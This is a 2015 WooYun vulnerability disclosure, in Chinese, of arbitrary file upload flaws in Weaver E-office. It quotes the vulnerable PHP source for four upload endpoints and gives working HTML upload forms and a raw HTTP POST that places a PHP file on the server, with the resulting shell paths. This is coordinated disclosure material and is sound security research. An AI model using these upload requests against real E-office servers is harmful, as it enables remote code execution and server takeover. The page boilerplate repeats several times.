泛微Eoffice 三处任意文件上传可直接getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0125592

漏洞标题：泛微Eoffice 三处任意文件上传可直接getshell

漏洞作者： Bear baby

提交时间：2015-07-11 12:10

修复时间：2015-10-11 14:18

公开时间：2015-10-11 14:18

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-11：细节已通知厂商并且等待厂商处理中
2015-07-13：厂商已经确认，细节仅向厂商公开
2015-07-16：细节向第三方安全合作伙伴开放
2015-09-06：细节向核心白帽子及相关领域专家公开
2015-09-16：细节向普通白帽子公开
2015-09-26：细节向实习白帽子公开
2015-10-11：细节向公众公开

简要描述：

在实验室奋斗了两天。。来一波

详细说明：

1.文件位置：/webservice/upload.php。相关代码如下：

<?php
include_once( "inc/utility_all.php" );
$pathInfor = pathinfo( $_FILES['file']['tmp_name'] );
$extension = $pathInfor['extension'];
$role = UPLOADROLE;
$attachmentID = createfiledir( );
global $ATTACH_PATH;
$path = $ATTACH_PATH.$attachmentID;
if ( !file_exists( $path ) )
{
				mkdir( $path, 448 );
}
$attachmentName = $_FILES['file']['tmp_name'];
$fileName = $path."/".$_FILES['file']['name'];
$fileName = iconv( "UTF-8", "GBK", $fileName );
move_uploaded_file( $_FILES['file']['tmp_name'], $fileName );
if ( !file_exists( $fileName ) )
{
				echo "false";
}
else
{				echo $fileName;
				echo $attachmentID."*".$_FILES['file']['name'];
}
?>

没有做任何限制直接上传，文件名为原文件名，文件路径如下

$path = $ATTACH_PATH.$attachmentID
$fileName = $path."/".$_FILES['file']['name'];

构造上传表单如下：

<form action="http://网站地址/webservice/upload.php" form enctype="multipart/form-data"  method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>

如下图，返回内容3023528241*i.php对应路径为/attachment/3023528241/i.php

2.文件位置：inc/jquery/uploadify/uploadify.php 相关代码如下

<?php
function createFileDir( )
{
				global $ATTACH_PATH;
				mt_srand( ( double )microtime( ) * 1000000 );
				$RADOM_ID = mt_rand( ) + mt_rand( );
				if ( !file_exists( $ATTACH_PATH.$RADOM_ID ) )
				{
								return $RADOM_ID;
				}
				else
				{
								createfiledir( );
				}
}
if ( !empty( $_FILES ) )
{
				$tempFile = $_FILES['Filedata']['tmp_name'];
				$attachmentID = createfiledir( );
				$uploadPath = $_REQUEST['uploadPath'];
				if ( trim( $uploadPath ) == "" )
				{
								$targetPath = $_SERVER['DOCUMENT_ROOT']."/attachment/".$attachmentID;
				}
				else
				{
								$targetPath = $uploadPath."/sent/attachment/".$attachmentID;
				}
				if ( !file_exists( $targetPath ) )
				{
								mkdir( $targetPath, 448, true );
				}
				$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];
				move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
				echo $attachmentID;
}
?>

也是没有任意过滤，文件名为原文件名，可直接上传shell。

$targetPath = $uploadPath."/sent/attachment/".$attachmentID;
$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];

构造上传表单如下：

<form action="http://网站地址/ inc/jquery/uploadify/uploadify.php" form enctype="multipart/form-data"  method="POST">
<input name=" Filedata" type="file">
<input name="" type="submit">
</form>

如下图，返回内容1720699075 对应路径为/attachment/ 1720699075/2.php

3.文件位置：/general/weibo/javascript/LazyUploadify/uploadify.php
部分相关代码如下：

<?php
….省略部分代码……
include_once( "inc/conn.php" );
if ( !empty( $_FILES ) )
{
				$tempFile = $_FILES['Filedata']['tmp_name'];
				$fileName = $_FILES['Filedata']['name'];
				$thumbWidth = $_REQUEST['thumbWidth'];
				$thumbHeight = $_REQUEST['thumbHeight'];
				$attachmentID = createfiledir( );
				$targetPath = ROOT_PATH."/attachment/".$attachmentID."/";
				if ( !file_exists( $targetPath ) )
				{
								mkdir( $targetPath, 448, true );
				}
				$targetPath = str_replace( "//", "/", $targetPath );
				$targetOriginalFile = $targetPath.$fileName;
				$targetOriginalFile = iconv( "UTF-8", "GBK", $targetOriginalFile );
				move_uploaded_file( $tempFile, $targetOriginalFile );
				$fileExt = strtolower( substr( $fileName, strrpos( $fileName, "." ) ) );
				switch ( $fileExt )
				{
				case ".jpg" :
				case ".jpeg" :
				case ".png" :
				case ".gif" :
								$targetThumbPath = ROOT_PATH."/attachment/thumb/".$attachmentID;
								if ( !file_exists( $targetThumbPath ) )
								{
												mkdir( $targetThumbPath, 448, true );
								}
								$targetThumbFile = $targetThumbPath."/".$fileName;
								$targetThumbFile = iconv( "UTF-8", "GBK", $targetThumbFile );
								resizeimage( $targetOriginalFile, $targetThumbFile, $thumbWidth, $thumbHeight );
								break;
				}
				$targetThumbFile = iconv( "GB2312", "UTF-8", $targetThumbFile );
				$returnValue['thubmPath'] = str_replace( ROOT_PATH, "", $targetThumbFile );
				$returnValue['attachmentID'] = $attachmentID;
				$returnValue['attachmentName'] = $fileName;
				$returnValue['attachmentSize'] = filesize( $targetOriginalFile );
				echo json_encode( $returnValue );
}
?>

还是无任何过滤，直接getshell。表单如下：

<form action="http://网站地址/general/weibo/javascript/LazyUploadify/uploadify.php" form enctype="multipart/form-data"  method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>

如下图返回为json格式。对应路径/attachment/2012291572/2.php

4.文件位置：/general/weibo/javascript/uploadify/uploadify.php
部分代码如下：

include_once( "inc/conn.php" );
include_once( "general/weibo/inc/weibo.inc.php" );
include_once( "general/weibo/inc/thumb_handler.php" );
if ( !empty( $_FILES ) )
{
				if ( $_REQUEST['uploadType'] == "log" )
				{
								$tempFile = $_FILES['Filedata']['tmp_name'];
								$fileName = $_FILES['Filedata']['name'];
								$targetPath = ROOT_PATH."/attachment/";
								$fileExt = substr( $fileName, strrpos( $fileName, "." ) );
								$logName = "log".$fileExt;
								$targetFile = str_replace( "//", "/", $targetPath )."/".$logName;
								move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
								resize( $targetFile, $targetFile, 295, 195 );
								$query = "SELECT * FROM unit";
								$result = exequery( $connection, $query );
								if ( mysql_num_rows( $result ) == 0 )
								{
												$query = "INSERT INTO unit (LOGO) VALUES ('".$logName."')";
								}
								else
								{
												$query = "UPDATE unit SET LOGO = '".$logName."'";
								}
								if ( exequery( $connection, $query ) )
								{
												echo $logName;
								}
								else
								{
												echo false;
								}
				}
				else
				{
								$tempFile = $_FILES['Filedata']['tmp_name'];
								$fileName = $_FILES['Filedata']['name'];
								$userID = $_REQUEST['userID'];
								$thumbWidth = $_REQUEST['thumbWidth'];
								$thumbHeight = $_REQUEST['thumbHeight'];
								$targetPath = ROOT_PATH."/attachment/personal/".$userID;
								if ( !file_exists( $targetPath ) )
								{
												mkdir( $targetPath, 448, true );
								}
								$fileExt = substr( $fileName, strrpos( $fileName, "." ) );
								$targetFile = str_replace( "//", "/", $targetPath )."/".$userID."_temp".$fileExt;
								move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
								$windowWidth = $_REQUEST['windowWidth'];
								$windowHeight = $_REQUEST['windowHeight'];
								resize( $targetFile, $targetFile, $windowWidth - 40, $windowHeight - 100 );
								list( $width, $height ) = getimagesize( $targetFile );
								echo json_encode( array(
												"width" => $width,
												"height" => $height,
												"imageSrc" => "/".str_replace( ROOT_PATH, "", $targetFile )
								) );
				}
}
?>

表单可以自行构造。Fiddler请求如下

POST http://172.18.30.133/general/weibo/javascript/uploadify/uploadify.php?uploadType=log HTTP/1.1
Host: 172.18.30.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: zou__Session=7f895dd642da7e165f485c5a638224e4; PHPSESSID=9ed7d522a1e2caf3f2fe76082450b3a8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214
-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------94401197120954--

Shell路径即/attachment/log.php

带userID则对应路径/attachment/personal/$userID/$userID_temp.php如下图

漏洞证明：

在phith0n的案例中随意挑了个测试

修复方案：

版权声明：转载请注明来源 Bear baby@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-07-13 14:17

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0125592

漏洞标题：泛微Eoffice 三处任意文件上传可直接getshell

相关厂商：泛微E-office

漏洞作者： Bear baby

提交时间：2015-07-11 12:10

修复时间：2015-10-11 14:18

公开时间：2015-10-11 14:18

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Bear baby@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0125592

漏洞标题：泛微Eoffice 三处任意文件上传可直接getshell

相关厂商：泛微E-office

漏洞作者： Bear baby

提交时间：2015-07-11 12:10

修复时间：2015-10-11 14:18

公开时间：2015-10-11 14:18

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0125592"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Bear baby@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：